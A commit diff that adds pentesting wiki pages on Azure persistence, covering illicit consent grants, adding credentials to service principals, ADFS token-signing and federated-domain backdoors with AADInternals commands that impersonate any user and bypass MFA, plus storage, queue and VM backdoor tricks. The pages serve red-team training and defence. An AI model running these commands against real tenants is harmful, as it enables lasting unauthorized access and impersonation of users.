Migrate to using mdbook

2025-12-31 23:15:48 -08:00 · 2024-12-31 17:04:35 +01:00
parent b9a9fed802
commit cd27cf5a2e
1373 changed files with 26143 additions and 34152 deletions
--- a/src/pentesting-cloud/azure-security/az-persistence/README.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/README.md
@@ -0,0 +1,68 @@
+# Az - Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Illicit Consent Grant
+
+By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
+
+Moreover, you could also accept that application with your user as a way to maintain access over it.
+
+### Applications and Service Principals
+
+With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
+
+It's possible to **target an application with high permissions** or **add a new application** with high permissions.
+
+An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
+
+This technique also allows to **bypass MFA**.
+
+```powershell
+$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
+Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
+```
+
+- For certificate based authentication
+
+```powershell
+Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
+```
+
+### Federation - Token Signing Certificate
+
+With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
+
+**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
+
+```powershell
+New-AADIntADFSSelfSignedCertificates
+```
+
+Then, update the certificate information with Azure AD:
+
+```powershell
+Update-AADIntADFSFederationSettings -Domain cyberranges.io
+```
+
+### Federation - Trusted Domain
+
+With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
+
+```powershell
+# Using AADInternals
+ConvertTo-AADIntBackdoor -DomainName cyberranges.io
+
+# Get ImmutableID of the user that we want to impersonate. Using Msol module
+Get-MsolUser | select userPrincipalName,ImmutableID
+
+# Access any cloud app as the user
+Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
+```
+
+## References
+
+- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
+
+{{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
@@ -0,0 +1,31 @@
+# Az - Queue Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Queue
+
+For more information check:
+
+{{#ref}}
+../az-services/az-queue-enum.md
+{{#endref}}
+
+### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+
+This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+
+```bash
+az storage queue create --name <new-queue-name> --account-name <storage-account>
+
+az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
+
+az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
+```
+
+## References
+
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
@@ -0,0 +1,41 @@
+# Az - Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{{#ref}}
+../az-services/az-storage.md
+{{#endref}}
+
+### Common tricks
+
+- Keep the access keys
+- Generate SAS
+  - User delegated are 7 days max
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
+
+These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
+
+```bash
+az storage account blob-service-properties update \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --enable-container-delete-retention true \
+  --container-delete-retention-days 100
+```
+
+### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
+
+These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
+
+```bash
+az storage blob service-properties delete-policy update \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --enable true \
+  --days-retained 100
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
--- a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
@@ -0,0 +1,25 @@
+# Az - VMs Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## VMs persistence
+
+For more information about VMs check:
+
+{{#ref}}
+../az-services/vms/
+{{#endref}}
+
+### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
+
+An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
+
+### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
+
+An attacker could get access to the instances and backdoor them:
+
+- Using a traditional **rootkit** for example
+- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
+- Backdooring the **User Data**
+
+{{#include ../../../banners/hacktricks-training.md}}